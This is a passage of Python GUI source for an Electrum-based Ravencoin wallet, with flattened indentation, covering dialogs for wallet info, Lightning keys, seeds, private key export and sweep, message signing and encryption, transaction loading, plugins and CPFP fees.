grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name") + ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type") + ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type") + ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('nocloud'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _(
"Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(QLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(lambda: self.init_lightning_dialog(dialog))
grid.addWidget(button, 5, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")),
5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx + 1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx + 1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s" % self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title=_("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = ravencoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not ravencoin.is_address(address):
self.show_message(_('Invalid Ravencoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2, 3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3, 1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2, 3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3, 1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t" + x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(
lambda: e.setText("Please wait... %d/%d" % (len(private_keys), len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s" % addr, pk])
else:
f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("RVN currently in your wallet will be used for the fee to sweep assets\n"
"if there is no RVN held in the private keys.\n"
"Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
self.use_own_cb = QCheckBox(_('Force use own RVN'))
def on_cb(x):
self.force_use_own = x == Qt.Checked
self.use_own_cb.stateChanged.connect(on_cb)
vbox.addLayout(Buttons(self.use_own_cb, CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if ravencoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet(
(ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
total_held = sum([coin.value_sats() for coin in coins], RavenValue())
coins_rvn = [coin for coin in coins if coin.value_sats().rvn_value.value != 0]
coins_assets = [coin for coin in coins if coin.value_sats().assets]
self.warn_if_watching_only()
# If there is no RVN in the privkeys, use our own
# TODO: dynamically use our own RVN if not enough
# TODO: Ensure that any RVN held in the privkey is moved over
use_own = total_held.rvn_value.value < 0.1 or self.force_use_own
if use_own:
coins_rvn += list(self.get_coins())
outputs = []
if total_held.assets:
outputs = [PartialTxOutput.from_address_and_value(addr, value=value, asset=asset) for asset, value in total_held.assets.items()]
if total_held.rvn_value.value != 0:
outputs += [PartialTxOutput.from_address_and_value(addr, value=total_held.rvn_value, is_max=not use_own)]
self.pay_onchain_dialog(coins_rvn + coins_assets, outputs, external_keypairs=keypairs, mixed=use_own)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
self.asset_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses") + ':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys") + ':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.save_blacklist:
self.config.set_key('asset_blacklist', self.asset_blacklist, True)
if d.save_whitelist:
self.config.set_key('asset_whitelist', self.asset_whitelist, True)
if d.save_whitelist or d.save_blacklist:
self.asset_list.update()
self.history_model.refresh('Changed asset white or black list', True)
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
vis = self.config.get('enable_op_return_messages', False)
self.pubkey_label.setVisible(vis)
self.pubkey_e.setVisible(vis)
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(), g.top(),
g.width(), g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
# TODO: On mac, this cannot be closed; disabled for now
def logview_dialog(self):
from electrum.logging import get_logfile_path, electrum_logger
def watch_file(fn, logviewer):
# poor man's tail
if os.path.exists(fn):
mtime = os.path.getmtime(fn)
if mtime > self.logfile_mtime:
# file modified
self.logfile_mtime = mtime
logviewer.clear()
with open(fn, "r") as f:
for line in f:
logviewer.append(line.partition('Z |')[2].lstrip(' ').rstrip('\n'))
d = WindowModalDialog(self, _('Log Viewer'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
self.logviewer = QTextEdit()
self.logviewer.setAcceptRichText(False)
self.logviewer.setReadOnly(True)
self.logviewer.setPlainText(
_("Enable 'Write logs to file' in Preferences -> General and restart Electrum-Ravencoin to view logs here"))
layout.addWidget(self.logviewer, 1, 1)
logfile = get_logfile_path()
self.logtimer = QTimer(self)
if logfile is not None:
load_logfile = partial(watch_file, logfile, self.logviewer)
self.logfile_mtime = 0
load_logfile()
self.logtimer.timeout.connect(load_logfile)
self.logtimer.start(2500)
d.exec_()
self.logtimer.stop()
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400, 250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0, 1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = RVNAmountEdit(self.get_decimal_point)
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb: Optional[int]) -> Optional[int]:
if fee_per_kb is None:
return None
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = round(fee)
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
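# Worked example (illustrative numbers only, not from the source): with a combined
# size of 300 bytes, a target rate of 10,000 sat/kvB and a parent fee of 1,000 sat,
# the child pays 10000 * 300 / 1000 - 1000 = 2,000 sat, which the two lines above
# then clamp into the [total_size, max_fee] range.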
suggested_feerate = self.config.fee_per_kb()
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
